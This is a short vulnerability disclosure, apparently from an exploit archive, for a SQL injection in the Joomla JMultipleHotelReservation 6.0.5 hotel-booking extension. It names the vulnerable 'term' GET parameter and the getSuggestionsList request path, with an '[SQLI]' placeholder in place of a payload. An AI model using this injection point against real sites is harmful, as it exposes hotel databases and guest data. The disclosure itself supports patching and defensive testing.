Joomla JMultipleHotelReservation 6.0.5 SQL Injection

Joomla JMultipleHotelReservation extension version 6.0.5 suffers from a remote SQL injection vulnerability.


MD5 | fd1c31cdbc735cf448d9ce8b39a1f8c0

################################################
#Title: Joomla JMultipleHotelReservation 6.0.5 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.cmsjunkie.com/joomla-hotel-portal
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/
#Product: 'Joomla JMultipleHotelReservation 6.0.5'
#Developer: CMSJunkie
#Extension type: Plugin
#Last updated: Oct 30 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: inurl:"Google is your Friend"
################################################
#
# Description:
# With over nine years of experience in the lodging industry, we offer an
easy to use, professional multiple hotel
# reservation software. Joomla Multiple Hotel Reservation is offering
management and reservation solutions for
# all types of hotels, motels, B&B, resorts, apartments etc.
#
#
# --Method=GET -p [term]
#
# -u "
http://127.0.0.1/j-myhotel/component/j-hotelportal/?task=hotels.getSuggestionsList&term=a/b'/[SQLI]
"
#
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

Related Posts